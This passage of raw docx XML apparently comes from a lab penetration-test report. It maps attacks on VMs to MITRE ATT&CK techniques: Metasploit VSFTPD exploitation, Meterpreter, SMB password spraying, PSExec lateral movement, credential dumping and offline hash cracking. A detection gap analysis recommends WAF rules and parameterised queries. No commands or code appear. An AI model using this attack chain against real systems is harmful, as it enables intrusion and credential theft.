                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>User credentials and hashes dumped from database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="35F6C9F4"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621E45" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1110.002</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30346D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Brute Force: Password Cracking</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E582100" w14:textId="10ABE467" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="008443EA" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL Map</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dictionary attack cracked SHA1 hashes offline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57AE5E05" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5759D17D" w14:textId="40A36754" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC682ED" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack generated hundreds of anomalous HTTP GET requests containing SQL metacharacters, UNION keywords, and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>SLEEP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) functions — all detectable by a WAF using the OWASP Core Rule Set [7]. Apache access logs recorded every request but were not monitored. Parameterised queries at the application layer would have eliminated this vulnerability entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3E98D3" w14:textId="5855CC6E" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Consolidated MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7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71"/>
        <w:gridCol w:w="1101"/>
        <w:gridCol w:w="2201"/>
        <w:gridCol w:w="1485"/>
        <w:gridCol w:w="1068"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="2D059E84"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F79B702" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="104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B6EB831" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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19D224B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="153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4395FB4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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81948AA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="340B322A"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B9EF1FD" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reconnaissance</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B64E0E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1046</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BDD2C15" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Network Service Discovery</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EF0CF8F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap</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757880D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="07D8255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C904E20" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reconnaissance</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711E570" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1595.002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49BBBED" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Active Scanning: Vuln Scanning</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5853C74" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap NSE</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36D0151" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="5F653757"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A1E4FAF" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Initial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7E39975" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</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182EFC8" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit Public-Facing App (VSFTPD)</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73569B5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metasploit</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724F202" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="6ACEB496"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08E989" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Execution</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5F3F9F1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1059.004</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C89634" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unix Shell</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3701E9" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Meterpreter</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E512A40" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="71E5BB3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6F2C872" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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B006AE4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1005</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A11B6D8" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data from Local System</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4A06CC9" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Shell</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7A3F93" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="32732E81"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54D5FB8" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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5DC4D3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1110.003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C54A839" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Brute Force: Password Spraying</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6C656D1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MSF SMB Login</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FD6E09" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="73DAD719"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CBDF89" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lateral Movement</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34B47FD" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1021.002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A1577BE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Services: SMB</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9FB520" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MSF PSExec</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DF46532" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3910D27A"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D7AD32B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Privilege Escalation</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03E07A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078</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BC78994" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Valid Accounts</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0F5C3C3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Meterpreter</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F63F73D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="2000FA8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5675AC6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">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9125091" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1003.002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EA9C76E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
